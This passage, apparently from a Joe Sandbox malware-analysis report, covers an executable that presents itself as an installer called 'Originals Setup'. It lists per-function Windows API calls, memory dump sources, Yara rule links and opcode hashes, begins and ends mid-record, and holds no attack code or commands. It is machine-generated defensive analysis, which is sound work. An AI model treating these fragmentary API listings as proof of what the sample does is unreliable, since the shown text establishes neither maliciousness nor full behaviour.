                                                                                                                                            • GetShortPathNameA.KERNEL32(00000000,00421A68,00000400), ref: 00405932
                                                                                                                                              • Part of subcall function 004057B3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004059E2,00000000,[Rename],00000000,00000000,00000000), ref: 004057C3
                                                                                                                                              • Part of subcall function 004057B3: lstrlenA.KERNEL32(004059E2,?,00000000,004059E2,00000000,[Rename],00000000,00000000,00000000), ref: 004057F5
                                                                                                                                            • GetShortPathNameA.KERNEL32(?,00421E68,00000400), ref: 0040594F
                                                                                                                                            • wsprintfA.USER32 ref: 0040596D
                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00421E68,C0000000,00000004,00421E68,?,?,?,?,?), ref: 004059A8
                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004059B7
                                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004059EF
                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421668,00000000,-0000000A,00409388,00000000,[Rename],00000000,00000000,00000000), ref: 00405A45
                                                                                                                                            • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405A57
                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00405A5E
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405A65
                                                                                                                                              • Part of subcall function 0040584E: GetFileAttributesA.KERNELBASE(00000003,00402C69,C:\Users\user\Desktop\HVSU7GbA5N.exe,80000000,00000003), ref: 00405852
                                                                                                                                              • Part of subcall function 0040584E: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405874
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                                                            • String ID: %s=%s$NUL$[Rename]
                                                                                                                                            • API String ID: 1265525490-4148678300
                                                                                                                                            • Opcode ID: 1c7b9dc5b9d373c95b3dd538fd3a589de0fc08670cd7a038be037713092c8044
                                                                                                                                            • Instruction ID: e8cacc7e92f5bf2d1a44c635cad04a40df604100f7174d9fb2de66c5d7927451
                                                                                                                                            • Opcode Fuzzy Hash: 1c7b9dc5b9d373c95b3dd538fd3a589de0fc08670cd7a038be037713092c8044
                                                                                                                                            • Instruction Fuzzy Hash: 60410171704B19BFD3206B215C89F6B3A5CDB45714F14023ABD01F62D2D67CA8018E7E
                                                                                                                                            Function 00402B42 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 40timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5D
                                                                                                                                            • MulDiv.KERNEL32(0009EC46,00000064,0009EC4A), ref: 00402B88
                                                                                                                                            • wsprintfA.USER32 ref: 00402B98
                                                                                                                                            • SetWindowTextA.USER32(?,?), ref: 00402BA8
                                                                                                                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BBA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                            • String ID: F$J$verifying installer: %d%%
                                                                                                                                            • API String ID: 1451636040-2980489140
                                                                                                                                            • Opcode ID: 7c6b42b6a0cc2db989286670b759c7d1809337f1b1d19a01d5db9df498489f5d
                                                                                                                                            • Instruction ID: 2a4a5d9d20a729fd9d452e33c08772ea7119627e62a29752c404fbbb79c7976e
                                                                                                                                            • Opcode Fuzzy Hash: 7c6b42b6a0cc2db989286670b759c7d1809337f1b1d19a01d5db9df498489f5d
                                                                                                                                            • Instruction Fuzzy Hash: 5601F471940209BBDF14AF60DD49EAE3779BB04345F008039FA06B52D0D7B9A955CB59
                                                                                                                                            Function 00405E28 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\HVSU7GbA5N.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405E80
                                                                                                                                            • CharNextA.USER32(?,?,?,00000000), ref: 00405E8D
                                                                                                                                            • CharNextA.USER32(?,"C:\Users\user\Desktop\HVSU7GbA5N.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405E92
                                                                                                                                            • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405EA2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Char$Next$Prev
                                                                                                                                            • String ID: "C:\Users\user\Desktop\HVSU7GbA5N.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                            • API String ID: 589700163-3172565213
                                                                                                                                            • Opcode ID: 936ec53846ae3d4c979f0b86072daa16fddb5806f2a9e6e631d156a7122fd3c6
                                                                                                                                            • Instruction ID: a4a2cc105071513804232ace241bb9437e981183223a596247e33b0ed04e6b88
                                                                                                                                            • Opcode Fuzzy Hash: 936ec53846ae3d4c979f0b86072daa16fddb5806f2a9e6e631d156a7122fd3c6
                                                                                                                                            • Instruction Fuzzy Hash: F111C461805B9129FB3217248C44B776F89CB96B60F18047BE5C4B22C3D77C5E428EAD
                                                                                                                                            Function 00403EDA Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetWindowLongA.USER32(?,000000EB), ref: 00403EF7
                                                                                                                                            • GetSysColor.USER32(00000000), ref: 00403F13
                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00403F1F
                                                                                                                                            • SetBkMode.GDI32(?,?), ref: 00403F2B
                                                                                                                                            • GetSysColor.USER32(?), ref: 00403F3E
                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00403F4E
                                                                                                                                            • DeleteObject.GDI32(?), ref: 00403F68
                                                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00403F72
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2320649405-0
                                                                                                                                            • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                                                                                                            • Instruction ID: d122295a95d7a35518708bb3646b4b032600d4a0088814026e1a2530b61c3467
                                                                                                                                            • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                                                                                                            • Instruction Fuzzy Hash: 04218471904705ABC7219F68DD08B4BBFF8AF01715F048A29E996E22E1D738EA44CB55
                                                                                                                                            Function 00402683 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D7
                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026F3
                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 0040272C
                                                                                                                                            • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 0040273E
                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402745
                                                                                                                                            • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 0040275D
                                                                                                                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 00402771
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3294113728-0
                                                                                                                                            • Opcode ID: 5456bc62459d66cde3aa9345bf3e569abf4febe9e7b849f405182c4fab6697a6
                                                                                                                                            • Instruction ID: 62ce17ec0f4375d45857f5132ba240fdd0ea0b04a4fb9e1f6e2a0a3b4674b9fe
                                                                                                                                            • Opcode Fuzzy Hash: 5456bc62459d66cde3aa9345bf3e569abf4febe9e7b849f405182c4fab6697a6
                                                                                                                                            • Instruction Fuzzy Hash: B6319C71C00128BBDF216FA5CD89DAE7E79EF09364F10423AF920762E0C7795D419BA9
                                                                                                                                            Function 00404771 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040478C
                                                                                                                                            • GetMessagePos.USER32 ref: 00404794
                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004047AE
                                                                                                                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 004047C0
                                                                                                                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047E6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                                                            • String ID: f
                                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                                            • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                                                                                            • Instruction ID: 7320c3ca21a199b12554e0b126592fdbaa3119cb9dfe1c5a5544a419b0626cb6
                                                                                                                                            • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                                                                                            • Instruction Fuzzy Hash: 7B019275D00218BADB00DB94DC85FFEBBBCAF45711F10412BBA11B71C0C3B465018BA5
                                                                                                                                            Function 00404667 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • lstrlenA.KERNEL32(Originals Setup: Completed,Originals Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404582,000000DF,00000000,00000400,?), ref: 00404705
                                                                                                                                            • wsprintfA.USER32 ref: 0040470D
                                                                                                                                            • SetDlgItemTextA.USER32(?,Originals Setup: Completed), ref: 00404720
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                                                            • String ID: %u.%u%s%s$Originals Setup: Completed
                                                                                                                                            • API String ID: 3540041739-3424068493
                                                                                                                                            • Opcode ID: 2fef8783583e05583b13a3a111104ffe67f6f47bd1d4956f9e9fcfce1648db61
                                                                                                                                            • Instruction ID: bb6c02d87b5a590dcf5e60bd08fb8011c89fc701b4454ccbd5a96a7ae09536e5
                                                                                                                                            • Opcode Fuzzy Hash: 2fef8783583e05583b13a3a111104ffe67f6f47bd1d4956f9e9fcfce1648db61
                                                                                                                                            • Instruction Fuzzy Hash: 6F11E773A041283BDB00666D9C41EAF3298DB82374F250637FA26F71D1F9799C1296E9
                                                                                                                                            Function 004038D3 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SetWindowTextA.USER32(00000000,Originals Setup), ref: 0040396B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: TextWindow
                                                                                                                                            • String ID: "C:\Users\user\Desktop\HVSU7GbA5N.exe"$1033$Originals Setup$Originals Setup: Completed
                                                                                                                                            • API String ID: 530164218-2537810721
                                                                                                                                            • Opcode ID: 5114115a6ebe5231764a3ce4d605c7881d7ff0c1eb634beed4f1a3f33a5eb945
                                                                                                                                            • Instruction ID: 871d24c221ce82b24610d398d310ce84231420a4e1270a2a5acaa8ae42907246
                                                                                                                                            • Opcode Fuzzy Hash: 5114115a6ebe5231764a3ce4d605c7881d7ff0c1eb634beed4f1a3f33a5eb945
                                                                                                                                            • Instruction Fuzzy Hash: 8511C6B1B046116BCB30DF55DC80A737BADEB85716364813FE802673A0D77DAD039A68
                                                                                                                                            Function 00402A3D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A5E
                                                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402AA3
                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402AC8
                                                                                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1912718029-0
                                                                                                                                            • Opcode ID: 82858c02e32d41fd7ca38c30764bbd1566dd555d0b274e926b0c66c461654363
                                                                                                                                            • Instruction ID: 7e4692ed1c3e967feaf617caf8b683db29fbfa99fde863b1c96f6eb31ad0523a
                                                                                                                                            • Opcode Fuzzy Hash: 82858c02e32d41fd7ca38c30764bbd1566dd555d0b274e926b0c66c461654363
                                                                                                                                            • Instruction Fuzzy Hash: C8114C71A00109FFDF21AF90DE49DAB3B7DEB54349B104136FA05B10A0DBB49E51AF69
                                                                                                                                            Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetDlgItem.USER32(?), ref: 00401CD0
                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                                                                                                                            • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                                                                                                                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401D1B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1849352358-0
                                                                                                                                            • Opcode ID: 3fa910a29a7471df273f3d5a519cdd9490650a943fe2164337c26205f225f611
                                                                                                                                            • Instruction ID: f51ac8410cbf6ce335f498807c5bd2b5625ae864585cec2d5bc31dfd5d98a64c
                                                                                                                                            • Opcode Fuzzy Hash: 3fa910a29a7471df273f3d5a519cdd9490650a943fe2164337c26205f225f611
                                                                                                                                            • Instruction Fuzzy Hash: 6DF012B2A05115BFE701EBA4EE89DAF77BCEB44301B109576F501F2191C7789D018B79
                                                                                                                                            Function 00401D26 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetDC.USER32(?), ref: 00401D29
                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                                                                                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                                                                                                                            • CreateFontIndirectA.GDI32(0040A7B8), ref: 00401DA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3808545654-0
                                                                                                                                            • Opcode ID: 6c97ca4c977f86aacd357c2655dec619d2d0312ab6bad79a0316e8acbd74949c
                                                                                                                                            • Instruction ID: e98614b17e7a5d10a155c4b6304f3e92ae7defc274e3a3420abb617ebef8a141
